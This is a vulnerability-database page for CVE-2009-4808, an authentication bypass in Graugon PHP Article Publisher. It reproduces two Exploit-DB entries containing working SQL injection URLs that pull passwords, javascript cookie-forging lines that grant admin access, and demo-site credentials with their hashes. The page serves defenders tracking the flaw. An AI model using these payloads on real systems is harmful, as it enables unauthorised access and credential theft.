VIR Vulnerability Intelligence Relay

CVE-2009-4808

high
Published 2010-04-23 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

admin.php in Graugon PHP Article Publisher 1.0 allows remote attackers to bypass authentication and obtain administrative access by setting the g_admin cookie to 1.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-8133 webapps php verified text ยท 1 KB
x0r ยท 2009-03-02

Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling

text exploit Source: Exploit-DB 
#########################################################################################
[0x01] Informations:

Name           : Graugon PHP Article Publisher 1.0
Download       : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability  : Multiple Sql Injections / Insecure Cookie Handling
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged Page: index.php [..] admin.php [..] view.php

[Code]
$c = $_GET['c'];

$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]

[code]
 
$TwoMonths = 60 * 60 * 24 * 60 + time(); 
setcookie(g_admin, 1, $TwoMonths);

[/code]

[code]

$id = $_GET['id']; [..]

$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]

#########################################################################################
[0x03] Exploits:

Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
          javascript:document.cookie ="g_admin=1; path=/"

########################################################################################


# milw0rm.com [2009-03-02]
EDB-6929 webapps php verified text ยท 2 KB
ZoRLu ยท 2008-11-01

Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling

text exploit Source: Exploit-DB 
[~] Article Publisher PRO Insecure Cookie Handling Vulnerability
[~]
[~] version: 1.5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------

demo admin login:

http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php

demo user login:

http://demo-article-publisher-pro.phparticlescript.com/login.php


admin_name: admin

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 1

or

user_name: zorlu

passwd: zorlu

passwd_md5: 2178fb3ee4a88f946ecb68734b266c10

user_id: 6

or

user_name: demo

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 2


exploit:

admin:

javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";

user: 

javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";

for demo admin: ( user_id: 1)

javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

for demo user: ( for user zorlu user_id: 6 )

javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";

for demo user: ( for user demo user_id: 2 )

javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-01]

Application impact
VendorProductVersionsFixed
graugonphp_article_publisher1.0

References

CWEs

CWE-287

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.